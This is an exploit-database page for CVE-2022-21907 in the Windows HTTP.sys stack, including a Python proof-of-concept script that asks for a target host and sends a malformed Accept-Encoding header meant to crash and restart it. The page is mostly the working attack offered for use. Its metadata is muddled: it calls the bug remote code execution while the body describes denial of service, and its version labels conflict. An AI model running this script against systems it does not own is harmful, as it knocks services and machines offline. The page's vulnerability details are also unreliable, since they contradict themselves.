Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution

vendor:

Windows 10

by:

nu11secur1ty

7.5

CVSS

HIGH

Remote Code Execution

119

CWE

Product Name: Windows 10

Affected Version From: Windows 10 version 2004

Affected Version To: Windows 10 version 2004

Patch Exists: NO

Related CWE: CVE-2022-21907

CPE: o:microsoft:windows_10:2004

Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2022-21907/

Other Scripts:

Platforms Tested: Windows

2022

Windows 10 v21H1 – HTTP Protocol Stack Remote Code Execution

The Windows 10 version 2004 is vulnerable to the HTTP Protocol Stack (HTTP.sys) due to a buffer overflow. This vulnerability allows an attacker to perform a denial of service (DoS) attack and restart the system. The vulnerability was first reported in CVE-2021-31166 and still exists in Windows 10 version 2004. The exploit for this vulnerability is a one-line command.

Mitigation:

Apply the latest security updates and patches provided by Microsoft. Disable unnecessary services and limit access to the HTTP Protocol Stack.

Source

Exploit-DB raw data:

## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
## Author: nu11secur1ty
## Date: 01.14.2022
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
## CVE-2022-21907


## Description:
NOTE: After a couple of hours of tests and experiments, I found that
there have been no vulnerabilities, this is just a ridiculous
experiment of Microsoft. When I decided to install the IIS packages on
these Windows platforms, everything was ok, and everything is patched!
Windows Server 2019, Windows 10 version 1809 - 2018 year are not
vulnerable by default, but after I decided to upgrade from 1909 to
2004. I found a serious problem! The Windows 10 version 2004 - 2020
year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack
method: buffer overflow - deny of service and restart the system. This
problem exists, from last year which is reported on CVE-2021-31166,
and still there! On that days I have worked on it again with the help
and collaboration of Axel Souchet 0vercl0k the author of the idea. On
that day, I wrote an only one-line command to exploit this
vulnerability!

[+]Exploit:
```python
#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907

from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED +"Please input your host...\n")
print(Style.RESET_ALL)

print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)

print(Fore.BLUE +"Sending of especially malicious crafted packages,
please wait...")
print(Style.RESET_ALL)
time.sleep(17)

print(Fore.GREEN)
# The PoC :)
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
'AAAAAAAAAAAAAAAAAAAAAAAA,\
	 BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
	 RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
	 TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
	 OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
	 ****************************stupiD, *, ,',})
# Not necessary :)
print(poc,"\n")
print(Style.RESET_ALL)
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)

## Time spend:
05:30:00